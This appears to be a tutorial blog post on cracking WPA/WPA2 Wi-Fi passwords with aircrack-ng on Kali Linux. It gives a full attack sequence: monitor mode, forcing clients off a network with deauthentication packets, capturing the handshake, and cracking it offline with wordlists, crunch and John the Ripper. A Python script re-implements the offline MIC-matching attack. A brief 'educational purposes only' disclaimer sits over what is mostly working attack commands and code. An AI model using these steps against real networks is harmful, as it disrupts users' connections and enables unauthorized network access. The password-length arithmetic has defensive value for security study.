Note:
This article is written for educational purposes only. It is illegal to hack a network that does not belong to you. You may get yourself in trouble if, say, the network you are trying to get into logs the packet injections from your machine: the traces you leave behind are what lead back to you. Therefore, please do not commit a crime.
This test was done on Kali Linux running in VMPlayer. The method described in this article cannot crack a WPA / WPA2 wireless network if no client is connected to it, because there is no handshake to capture. It is also difficult to capture a handshake if the client's signal is very weak.
Step 1: Check Your Wireless Adapter
root@kali:~/test# airmon-ng
This command lists your wireless adapter, if you have one. On a virtual machine you may find that the wireless adapter is not detected. In this case please read how-to-put-wireless-adapter-in-monitor
Step 2: Check for Interfering Processes and Kill Them
root@kali:~/test# airmon-ng check
Found 2 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!
PID Name
3179 dhclient
3260 NetworkManager
You need to kill these processes because they keep reconfiguring the wireless interface and will cause trouble when you run aireplay-ng, i.e. you may not be able to capture a handshake. Note that this also takes down your normal network connection until you restart them.
airmon-ng check kill
Step 3: Put Your Wireless Adapter in Monitor Mode
airmon-ng start wlan0
Older versions of aircrack-ng create a new monitor interface called mon0, which is the name used in the commands below. Newer versions instead rename the adapter to wlan0mon, so substitute whatever interface name airmon-ng reports.
Step 4: Pre-scan Available Wireless Networks
airodump-ng mon0
This displays a list of wireless networks with details such as signal strength, channel number, AP MAC address (BSSID), network name (ESSID), the MAC addresses of connected clients, etc.
Jot down the channel and the MAC address of the network you intend to crack, and the MAC address of at least one connected client. After that, you can exit by pressing Ctrl-C or q.
Step 5: Monitor and Capture Network Packets and the Handshake to a File
airodump-ng -c 11 -w captured --bssid <AP mac address> mon0
This locks the adapter to the channel of the target AP and writes everything it captures to files with the prefix "captured". The channel here is 11 but yours may be different. Once a handshake has been captured, airodump-ng shows "WPA handshake: <AP mac address>" in the top right corner of its display. Leave it running and do not exit yet.
Step 6: Injecting Deauthentication Packets to Force the Client to Re-associate with the AP
Open a new terminal and run the command:
aireplay-ng -0 10 -a <AP mac address> mon0
Attack mode -0 is the deauthentication attack; here it sends 10 bursts of deauthentication frames on behalf of the AP (-1 is the fake-authentication attack used against WEP and is of no use here). Run this command and watch for the "WPA handshake" indicator on the other terminal where airodump-ng is running. Rest for a few seconds between attacks until a handshake is captured, then stop both aireplay-ng and airodump-ng (on the other terminal).
This attack kicks the connected client off the network. When the client reconnects to the AP, the two perform the WPA 4-way handshake again and your machine has the chance to capture it. The handshake does not contain the password or any public/private key: it carries the two random nonces exchanged by the AP and the client, plus a message integrity code (MIC) computed with a key derived from the password and the network name. That is enough to test candidate passwords offline: a guess is correct if it reproduces the captured MIC.
The handshake is captured in the file you specified in airodump-ng, i.e. -w captured. So the file is "captured-01.cap" if Step 5 was run for the first time. If airodump-ng had exited and was run a 2nd time, the file is "captured-02.cap", and so on. Take note of the file name that contains the handshake.
In the event that the client's signal is weak, it may be easier to target one client directly by specifying its MAC address:
aireplay-ng -0 10 -a <AP MAC address> -c <client MAC address> mon0
Step 7: Crack the Password
You can do this step on another day without the need to be near the targeted AP network. Note that if the password is long enough, it is very difficult to crack. The following are the reasons why.
Calculating how long you need to run all password combinations by brute force:
Depending on your CPU power, the number of password tests per second varies. If the password is 8 characters drawn from the lower-case letters and digits, there are 36 possible values for each position, which makes 36^8 combinations, i.e. 2821109907456 possible passwords! At 1000 password tests per second you need 89.4 years to try them all!
Therefore, it is encouraged to use long passwords and to mix lower case, upper case, numerals, and even symbols such as +, -, %, etc. A 16 character password drawn from lower case, upper case and numerals has 62^16 = 4.77x10^28 combinations. Even at 1 billion password tests per second you would need 1.5 trillion years to try them all!
Because of this, a good password list usually cracks faster than brute force, as people tend to be negligent and choose passwords that are easy to remember.
These are the commands that are commonly used:
By password list:
aircrack-ng -w /mydir/wordlist captured-01.cap
The ability to crack is as good as the quality of the wordlist.
By word crunching:
crunch 6 8 0123pasword | aircrack-ng -a 2 captured-01.cap -e <AP network name> -b <AP mac address> -w -
The -b option with the AP MAC address can be omitted when -e is given. The crunch command generates every combination from 6 to 8 characters of the characters specified, "0123pasword" (11 distinct characters), which is 11^6+11^7+11^8 = 235617613 combinations and would need 2.7 days to test at 1000 passwords/sec.
Word crunching is useful if you know some of the characters that are used in the password.
man crunch for more options.
By brute force using John the Ripper, saving the session so it can be resumed:
john --incremental=all --session=MyBruteSession --stdout | aircrack-ng -a 2 -e <AP network name> captured-01.cap -w -
To restore the previous session and continue from the last tested password (the name must match the one given to --session):
john --restore=MyBruteSession | aircrack-ng -a 2 -e <AP network name> captured-01.cap -w -
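To show what the captured handshake actually gives the attacker (Step 6) and what aircrack-ng -a 2, the wordlist and the crunch pipeline above really do with it (Step 7), here is an added example in Python. It is not code from this post or from aircrack-ng; it re-implements the 802.11i key derivation and MIC check that the cracker performs for every candidate password. The handshake it works on is constructed inline (made-up MAC addresses, nonces, the SSID "TestNet" and the passphrase "pasword123"), so it runs offline with no .cap file and no wireless adapter.

```python
"""Offline WPA2-PSK attack on a 4-way handshake (added example, see lead-in).

Constructed input: MACs, nonces and the EAPOL frame are made up, and the MIC is
computed from a chosen passphrase with the real algorithm, so no .cap is needed.
"""
import hashlib
import hmac
import itertools
from dataclasses import dataclass
from typing import Iterable, Iterator, Optional


@dataclass
class Handshake:
    ssid: bytes
    ap_mac: bytes      # authenticator address (AA)
    client_mac: bytes  # supplicant address (SPA)
    anonce: bytes      # nonce from message 1 (AP -> client)
    snonce: bytes      # nonce from message 2 (client -> AP)
    eapol: bytes       # message 2 EAPOL-Key frame with its MIC field zeroed
    mic: bytes         # the 16-byte MIC as captured in message 2

def pmk_from_passphrase(passphrase: str, ssid: bytes) -> bytes:
    # 802.11i: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 rounds, 256 bits).
    # These 4096 rounds are the cost of "one password test" in the estimates above.
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid, 4096, 32)

def prf(key: bytes, label: bytes, data: bytes, nbytes: int) -> bytes:
    # 802.11i PRF-n: HMAC-SHA1(key, label || 0x00 || data || i) for i = 0, 1, ...
    out = b""
    for i in range((nbytes + 19) // 20):
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
    return out[:nbytes]

def ptk_from_pmk(pmk: bytes, hs: Handshake) -> bytes:
    # PTK = PRF-384(PMK, "Pairwise key expansion",
    #               min(AA,SPA) || max(AA,SPA) || min(ANonce,SNonce) || max(ANonce,SNonce))
    data = (min(hs.ap_mac, hs.client_mac) + max(hs.ap_mac, hs.client_mac)
            + min(hs.anonce, hs.snonce) + max(hs.anonce, hs.snonce))
    return prf(pmk, b"Pairwise key expansion", data, 48)

def mic_for(passphrase: str, hs: Handshake) -> bytes:
    # WPA2 (key descriptor version 2): MIC = HMAC-SHA1(KCK, EAPOL frame)[:16],
    # KCK being the first 16 bytes of the PTK. (WPA/TKIP uses HMAC-MD5 instead.)
    kck = ptk_from_pmk(pmk_from_passphrase(passphrase, hs.ssid), hs)[:16]
    return hmac.new(kck, hs.eapol, hashlib.sha1).digest()[:16]

def crack(hs: Handshake, candidates: Iterable[str]) -> Optional[str]:
    # The offline attack: recompute the MIC for each candidate and compare it with
    # the captured one. Nothing touches the AP, so this runs anywhere, any time.
    for cand in candidates:
        if hmac.compare_digest(mic_for(cand, hs), hs.mic):
            return cand
    return None

def crunch(min_len: int, max_len: int, charset: str) -> Iterator[str]:
    # Equivalent of: crunch <min_len> <max_len> <charset>
    for n in range(min_len, max_len + 1):
        for combo in itertools.product(charset, repeat=n):
            yield "".join(combo)

def keyspace(min_len: int, max_len: int, charset: str) -> int:
    # Number of candidates crunch emits, e.g. 11^6 + 11^7 + 11^8 for "0123pasword".
    k = len(set(charset))
    return sum(k ** n for n in range(min_len, max_len + 1))

def build_eapol_msg2(snonce: bytes, replay_counter: int = 1) -> bytes:
    # Constructed 802.1X EAPOL-Key frame (message 2 of 4), MIC field zeroed.
    # A real capture also carries the client's RSN IE in the key data field.
    key_info = 0x010A  # descriptor version 2 (HMAC-SHA1 MIC), pairwise, MIC bit
    body = (b"\x02"                            # descriptor type: RSN
            + key_info.to_bytes(2, "big")
            + (16).to_bytes(2, "big")          # key length: CCMP
            + replay_counter.to_bytes(8, "big")
            + snonce                           # key nonce (32 bytes)
            + bytes(16) + bytes(8) + bytes(8)  # key IV, key RSC, key ID
            + bytes(16)                        # key MIC, zero while computing
            + bytes(2))                        # key data length: 0
    return b"\x02\x03" + len(body).to_bytes(2, "big") + body  # 802.1X v2, EAPOL-Key

def make_sample_handshake(passphrase: str = "pasword123") -> Handshake:
    # Constructed handshake; the MIC is computed as a real client would compute it.
    anonce = hashlib.sha256(b"constructed anonce").digest()
    snonce = hashlib.sha256(b"constructed snonce").digest()
    hs = Handshake(ssid=b"TestNet", ap_mac=bytes.fromhex("00112233aabb"),
                   client_mac=bytes.fromhex("66778899ccdd"), anonce=anonce,
                   snonce=snonce, eapol=build_eapol_msg2(snonce), mic=b"")
    hs.mic = mic_for(passphrase, hs)
    return hs

if __name__ == "__main__":
    hs = make_sample_handshake()
    # Wordlist attack, like: aircrack-ng -w wordlist captured-01.cap
    print(crack(hs, ["password", "letmein", "pasword123", "qwerty"]))
    # Word crunching, like: crunch 8 8 p1 | aircrack-ng -a 2 -e TestNet captured-01.cap -w -
    print(keyspace(6, 8, "0123pasword"))
    print(crack(make_sample_handshake("p1p1p1p1"), crunch(8, 8, "p1")))
```

Every candidate costs one PBKDF2 run of 4096 HMAC-SHA1 rounds before the cheap MIC comparison, which is why aircrack-ng's rate is measured in thousands of keys per second on a CPU rather than millions, and why a good wordlist beats exhaustive crunching in practice. The only per-network inputs the cracker needs are the SSID, the two MAC addresses, the two nonces and one MIC, all of which airodump-ng writes into captured-01.cap.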
That's it.